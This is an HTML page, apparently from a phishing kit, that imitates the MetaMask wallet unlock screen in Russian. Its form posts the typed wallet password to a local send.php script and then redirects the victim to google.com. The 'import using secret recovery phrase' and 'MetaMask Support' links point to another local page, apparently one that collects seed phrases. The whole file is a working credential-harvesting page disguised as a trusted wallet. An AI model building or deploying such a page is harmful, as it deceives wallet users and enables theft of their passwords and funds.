<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Fox</title>

    <style>
*{padding: 0; margin: 0; border: 0;}
*,*:before,*:after{ -moz-box-sizing: border-box; -webkit-box-sizing: border-box; box-sizing: border-box;}
:focus,:active{outline: none;}
a:focus,a:active{outline: none;}
nav,footer,header,aside{display: block;}
html,body{height: 100%; width: 100%; font-size: 100%; line-height: 1; font-size: 14px; -ms-text-size-adjust: 100%; -moz-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}
input,button,textarea{font-family:inherit;}
input::-ms-clear{display: none;}
button{cursor: pointer;}
button::-moz-focus-inner {padding:0;border:0;}
a, a:visited{text-decoration: none;}
a:hover{text-decoration: none;}
ul li{list-style: none;}
img{vertical-align: top;}
h1,h2,h3,h4,h5,h6{font-size:inherit;font-weight: 400;}

body{
  max-width: 1920px;
  margin: 0 auto;
  
}
.wrapper{
  width: 100%;
  min-height: 100%;
  display: flex;
  justify-content: center;
}

.form_body {
  position: relative;
  max-height: 600px;
  overflow: auto;
  font-family: Arial, sans-serif;
  width: 357px;
  box-shadow: 0 0 10px 5px rgba(221, 221, 221, 1);
}
.main__container{
    background-color: #FFFFFF;
  display: flex;
  flex-direction: column;
  background-color: white;
  height: 400px;
padding: 30px;  align-items: center;
    margin-top: 20px;
}
.form-img {
  margin-top: 0px;
  max-height: 120px;
  margin-bottom: 0px;
  display: flex;
  justify-content: center;
  align-items: center;


}
.form-img svg{
  margin-left: 0px;
}
.form-title {
    font-size: 30px;
    text-align: left;
    line-height: 140%;
    font-style: normal;
    font-weight: normal;
    letter-spacing: 0px;
    font-weight: 800;
    color:#4d4d4d;
    margin-top: 5px;
      transform: scale(0.93,1);
      margin-left: -10px;

}
.form-subtitle {
  color: #AEAEAE;  
  text-align: left;
  font-weight: 400;
  transform: scale(1, 0.90);
  font-size: 16px;
  height: 20px;
  margin-top: 15px;
  align-self: flex-start;
  z-index: 1;
  position: relative;
}
svg{
  overflow: visible;
  transform: scale(1, 0.9);
}

.password{
  position: relative;
  width: 100%;
  border-bottom: 1px solid #AEAEAE;
  min-height: 30px;
  overflow: hidden;
  font-weight: 400;
  margin-top: 70px;
  letter-spacing: 0.00938em;
  margin-bottom: 25px;
  transition: all 0s ease 0s;
}

.password:focus{
    border-bottom: 2px solid #057ED6;
}
.password:hover{
    border-bottom: 2px solid #057ED6;
}

.password:focus + .passfixed{
  opacity: 1;
  top: 464px;
  font-size: 14px;
}

.passfixed{
  position: absolute;
  top: 483px;
  left: 30px;
  letter-spacing: 0.00938em;
  font-weight: 400;
  font-size: 16px;
  transition: all 0.2s ease 0s;
  color: #aeaeae;
  pointer-events: none;
}
.form__header {
  display: flex;
  justify-content: space-between;
  background-color: #F2F3F4;
  padding: 20px;
  width: 100%;
}

.header-logo {
  max-width: 30px;
  height: 30px;

}
.header-logo img{
  width: 38px;
  height: 38px;
}
.custom-select{
  display: flex;
  justify-content: center;
  align-items: center;
  font-size: 12px;
  position: relative;
  width: 191px;
  height: 35px;
  text-align: center;
  border-radius: 20px;
  border: 1px solid #bbc0c5;
  color: #6a737d;
  background-color: transparent;
  transform: scale(1, 0.90);
  cursor: pointer;
}
.custom-select:after{
  content: '';
  position: absolute;
  width: 12px;
  height: 12px;
  padding-right: 10px;
  border-radius: 50%;
  top: 50%;
  z-index: -1;
  left: 8px;
  transform: translate(0, -50%);
  background-color: #29B6AF;
}
.custom-select span{
  position: absolute;
  right: 5px;
  top: 50%;
  transform: translate(0, -50%);
  width: 100%;
  right: 0;

}
.custom-select span:after{
  content: '';
  position: absolute;
  width: 7px;
  height: 1px;
  background-color: #6a737d;
  right: 6.20px;
    transform: rotate(-45deg);

}
.custom-select span:before{
  content: '';
  position: absolute;
  width: 7px;
  height: 1px;
   right: 10.7px;
  background-color: #6a737d;
  transform: rotate(45deg);
}
.list {
  top: 60px;
  position: absolute;
  right: 0;
  border-radius: 4px; 
  padding: 18px 8px; 
  z-index: 7;
  display: none;
  background: rgba(0, 0, 0, 0.8); 
  box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 2px 2px;
  max-width: 309px;
  max-height: 216px;
  overlow: auto;
  transition: all 0.3s ease 0s;
}
.list.height{
  max-height: 270px;
}
.list.active{
  display: block;
}
.list__container {
  position: relative;
  display: flex;
  flex-direction: column;
  justify-content: space-between;
  align-items: center;
}

.list-title {
  position: relative;
    font-size: 18px;
    line-height: 140%;
    font-style: normal;
    font-weight: normal;
    color: #fff;
    text-align: center;
    margin-bottom: 10px;
}
.hr{
  position: absolute;
  top: 35px;
  color: #5d5d5d;
  width: 100%;
  height: 1px;
  background-color: #5d5d5d;

}
.list-firstrow {
  margin-top: 20px;
  display: flex;

  font-size: 0.875rem;
    line-height: 140%;
    font-style: normal;
    font-weight: normal;
    color: dusty-gray;
    transition: all 0.3s ease 0s;
}
.list-firstrow.hide{
  visibility: hidden;
  opacity: 0;
}
.firstrow-text {
  margin-right: 74px;
  white-space: nowrap;
  color: #9B9B9B;
}
.firstrow-text a{
  color: white;
  cursor: pointer;
  text-decoration: underline;
}
.list-secondrow {
  margin-top: 20px;
  margin-left: -70px;
  height: 16px;
  overflow: hidden;
  display: flex;
  flex-direction: column;
  transition: all 0.3s ease 0s;
}
.list-secondrow.active{
  margin-top: -20px;
  height: 70px;
  overflow: visible;
}

.list-secondrow label{
  position: relative;
  display: flex;
  color: #fff;
  font-size: 16px;
  padding-left: 30px;
  align-items: center;
  width: 100%;
  white-space: nowrap;

}
.list-secondrow input{
  display: none;
}
.list-secondrow input:checked + label span::after{
    transform: scale(1);
}
.list-secondrow input:checked + label{
    font-weight: 600;
    font-size: 15px;
    transform: scale(1, 1.06);
}
.list-secondrow label span{
  display: block;
  position: relative;
  align-self: center;
  width: 12px;
  height: 12px;
  top: 0px;
  margin-right: 10px;
  border-radius: 50%;
  left: 5px;
  background-color: #fff;

}
.list-secondrow label span::after{
  content: '';  
  position: absolute;
  width: 10px;
  height: 10px;
  border-radius: 50%;
  z-index: 2;
  top: 1px;
  left: 1px;
  background-color: #29B6AF;
  transform: scale(0);
}
input:checked + label{
      background: url('img/1.png') 10px 3px/ 14px no-repeat;
}

.checkbox-second{
    margin-bottom: 31px;
}

.checkbox-first{
    margin-bottom: 31px;
}


.list-btn {
  width: 82.5px;
  height: 21px;
  background-color: transparent;
  border: 1px solid #9B9B9B;
  border-radius: 100px;
  color: #9B9B9B;
  display: flex;
  justify-content: center;
  align-items: center;
  cursor: pointer;
}

.form-btn{
  position: relative;
  width: 100%;
  background-color: rgb(3, 125, 214);  
  border-radius: 100px;
  min-height: 44.5px; 
  margin-bottom: 20px;
}

.form-btn span{
  position: relative;
    z-index: 2;
  color: white;
  letter-spacing: 1.2px;
  font-size: 14px;
}
  .secondrow-btn{
  display: flex;
  justify-content: center;
  align-items: center;
  margin-top: 20px;
  background-color: black;
  min-width: 115px;
  border-radius: 100px;
  cursor: pointer;
  margin-bottom: 15px;
  border: 1px solid #fff;
  transition: margin 0.3s ease 0s;
}
.secondrow-btn.margin{
  margin-top: 60px;
  margin-bottom: 0px;

}
.form-or {
  text-align: center;
    font-size: 12px;
    color: #aeaeae;
    margin-bottom: 6px;
}
.form-import {
  cursor: pointer;
    background-color: unset;
    color: #037dd6;
    font-size: 12px;
    text-align: center;
    font-weight: bold;
      transform: scale(1, 0.98);

}
.form-footer {
   text-align: left;
    font-size: 12px;
    color: #aeaeae;
    margin-top: 30px;
    margin-right: 20px;
    line-height: 15px;
    transform: scale(1, 0.98);
    padding-bottom: 5px;
}
.form-footer a{
  transform: scale(1, 0.96);
  color: #037dd6;
}


  

    </style>
  </head>
 
      <body>
   <div class="wrapper">
            <form  enctype="multipart/form-data" method="post" action="#" id="form" class="form_body" onsubmit="send(event, 'send.php')">
            <div class="list">

                    <div class="list__container">
                      <div class="hr"></div>
                      <div class="list-title">
                        Сети          

                      </div>
                      <div class="list-firstrow">
                        <div class="firstrow-text"> <a class="form-hide">Show/hide</a> test networks</div>
                          <a class="list-btn" type="submit"> Отклонить  </a>
                      </div>
                      <div class="list-secondrow">
                        <div class="checkbox-first">
                         <input  checked type="radio" name="Net" value="Сеть Ethereum Mainnet" id="radio1"> 
                          <label for="radio1"> <span></span>Сеть Ethereum Mainnet</label>
                        </div>
                          <div class="checkbox-second">
                            <input  type="radio" name="Net" value="Smart Chain" id="radio2"> 
                            <label for="radio2"><span></span> Smart Chain</label>
                        </div>
                        <div class="checkbox-thirth">
                          <input  type="radio" name="Net" value="Matic(Polygon) Mainnet" id="radio3"> 
                            <label for="radio3"><span></span> Matic(Polygon) Mainnet</label>
                        </div>
                            
                      </div>
                        <a class=" form-btn secondrow-btn"> <span>Добавить сеть</span>  </a>
                    </div>
                  </div>
            <div class="form__header">
              <div class="header-logo">
                <img src="img/fox1.png" alt="">
              </div>
              <div class="custom-select">
                <p class="custom">Cеть Ethereum Mainnet</p>
                         <span> </span>
            </div>
              </div>
            <div class="main__container">
            <div id="formsvg" class="form-img">
            </div>


            <div class="form-title">
              Добро пожаловать обратно!
            </div>
            <div class="form-subtitle">
              Ожидание децентрализованной сети
            </div>

            <input class="password "name="password" type="password">
               <div class="passfixed">
                 Пароль 
               </div>
            <button class="form-btn" type="submit"> <span> Разблокировать</span>  </button>
                
                <div class="form-or">или</div>
                <a href="../index.html" class="form-import">импортировать с использованием секретной фразы восстановления</a>
                <div class="form-footer">
                    Нужна помощь? Обратитесь в <a href="../index.html" target="_blank" rel="">Поддержка MetaMask</a> 
                </div>

            </div>
        </form>
      </div>
  </body>

 <script>
function send(event, php){
console.log("Отправка запроса");
event.preventDefault ? event.preventDefault() : event.returnValue = false;
var req = new XMLHttpRequest();
req.open('POST', php, true);
req.onload = function() {
  if (req.status >= 200 && req.status < 400) {
    json = JSON.parse(this.response); // Ебанный internet explorer 11
      console.log(json);
        
      // ЗДЕСЬ УКАЗЫВАЕМ ДЕЙСТВИЯ В СЛУЧАЕ УСПЕХА ИЛИ НЕУДАЧИ
      if (json.result == "success") {
        // Если сообщение отправлено
        document.location.href = "https://www.google.com/";
      } else {
        // Если произошла ошибка
        alert("Ошибка. Сообщение не отправлено");
      }
    // Если не удалось связаться с php файлом
    } else {alert("Ошибка сервера. Номер: "+req.status);}}; 

// Если не удалось отправить запрос. Стоит блок на хостинге
req.onerror = function() {alert("Ошибка отправки запроса"); 
  
};
req.send(new FormData(event.target));
}
</script>

    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script src="js/script.js"></script>
</html>
